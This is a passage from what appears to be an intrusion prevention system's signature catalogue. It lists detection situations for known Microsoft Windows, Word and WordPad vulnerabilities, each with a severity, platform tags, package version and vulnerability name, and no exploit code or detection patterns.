Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-DVR-MS-CVE-2011-0042

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows Vista, Windows 7, Windows 2008 R2, Any Hardware, MS2011-03, CVE2011, Windows XP not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-380-4219
Vulnerability: Microsoft-Windows-DVR-MS-CVE-2011-0042
Description:
Back to top

HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-04, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-391-4219
Vulnerability: Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Microsoft Windows Fax Services deteted
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows 7, Any Hardware, MS2011-04, CVE2010, Windows XP not specific, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow

About this situation: Suspicious EMF image file detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-248-3038
Vulnerability: HTTP-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

About this situation: Detects EMF images potentially exploiting MS09-006
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-03, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-248-3038
Vulnerability: Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Expression Web detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Graphics Rendering Enigine detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP 64-bit, Windows 2003 SP1, Windows Vista, Windows 2003 64-bit, Windows XP 64-bit SP2, Windows 2003 SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2008-09, CVE2007, Windows XP 64-bit not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-VML-BOF
Description:
Back to top

HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Graphics Rendering Enigine detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP 64-bit, Windows 2003 SP1, Windows Vista, Windows 2003 64-bit, Windows XP 64-bit SP2, Windows 2003 SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2008-09, CVE2008, Windows XP 64-bit not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-248-3038
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
Description:
Back to top

HTTP_SS-Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2002, CVE2002, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: HTTP-Microsoft-Help-Facility-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

About this situation: Detected an attempt to exploit buffer overflow vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP2, Windows 2003 SP2, Any Hardware, MS2007-10, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in Microsoft Windows Media Encoder 9 detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Windows Media Encoder, MS2008-09, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum

About this situation: An attempt to exploit ASF file parsing vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Format Runtime x64 Edition, Windows Media Services, MS2007-12, CVE2007, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Media-Playback-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Media Format Runtime detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-09, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Windows-Media-Playback-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243

About this situation: Detected attempt to exploit a vulnerability in Microsoft Messenger
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Any Hardware, Microsoft Messenger, MS2011-04, CVE2011, Windows XP not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243
Description:
Back to top

HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-375-4219
Vulnerability: Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Description:
Back to top

HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-399-4219
Vulnerability: Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Description:
Back to top

HTTP_SS-Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-06, CVE2010, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Producer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Movie Maker, Microsoft Producer, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-389-4219
Vulnerability: Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Movie Maker detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Movie Maker, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Scripting-Engine-Information-Disclosure-CVE-2011-0031

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Any Hardware, MS2011-02, CVE2011, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-376-4219
Vulnerability: Microsoft-Windows-Scripting-Engines-Information-Disclosure-CVE-2011-0031
Description:
Back to top

HTTP_SS-Microsoft-Windows-Search-Protocol-Handler-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows Vista, Windows 2008, Any Hardware, MS2008-12, CVE2008, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-191-2032
Vulnerability: Microsoft-Windows-Search-Protocol-Handler-Command-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows VBScript detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-290-4219
Last changed: sgpkg-ips-290-4219
Vulnerability: Microsoft-Windows-VBScript-Help-File-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows VBScript detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-291-4219
Vulnerability: Microsoft-Windows-VBScript-Help-File-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow

About this situation: Detects long WebDAV resource names from server responses
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows WebDAV Mini-Redirector, MS2008-02, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2009-11, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-WMI-Administrative-Tools-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in Microsoft WMI Administrative Tools detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft WMI Administrative Tools, MS2011-04, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Microsoft-WMI-Administrative-Tools-ActiveX-Control
Description:
Back to top

HTTP_SS-Microsoft-WMITools-ActiveX-Control-CVE-2010-3973

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Any Hardware, Internet Explorer, MS2011-04, CVE2010, Windows XP not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
Description:
Back to top

HTTP_SS-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption

About this situation: Microsoft Word Crafted Sprm Structure Stack Memory Corruption
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-12, CVE2008, Windows not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: HTTP-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow

About this situation: Microsoft Word dpcallout RTF Control Word Handling Buffer Overflow
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow

About this situation: An attempt to exploit an integer overflow vulnerability in Microsoft Word detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, Microsoft Word Viewer, Microsoft Outlook, Microsoft Works, MS2008-12, CVE2008, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-191-2032
Vulnerability: Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Word-File-Information-Memory-Corruption-MS09-068

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2009-11, CVE2009, Windows not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-264-3038
Vulnerability: Microsoft-Word-File-Information-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption

About this situation: Malicious Word document detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, MS2007-02, CVE2006, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-328-4219
Vulnerability: HTTP-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

About this situation: A malicious Word document targeting CVE-2010-1903 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-329-4219
Last changed: sgpkg-ips-329-4219
Vulnerability: Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Word Desktop detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-05, CVE2008, Windows not specific, Microsoft Word not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow

About this situation: Microsoft Word RTF Mismatched dpendgroup Buffer Overflow
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: HTTP-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

About this situation: A malicious RTF document targeting CVE-2010-1902 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

About this situation: A malicious RTF document targeting CVE-2010-1901 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption

About this situation: Microsoft Word RTF Stylesheet Control Word Memory Corruption
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS

About this situation: Microsoft Word RTF Stylesheet Control Word Memory Corruption
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Office not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-WordPad-Text-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft WordPad detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, WordPad, MS2010-09, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Microsoft-WordPad-Text-Converter-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-WordPad-Text-Converter-CVE-2010-2563

About this situation: An attempt to exploit a vulnerability in Microsoft WordPad
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, WordPad, MS2010-09, CVE2010, Windows XP not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Vulnerability: Microsoft-WordPad-Text-Converter-CVE-2010-2563
Description:
Back to top

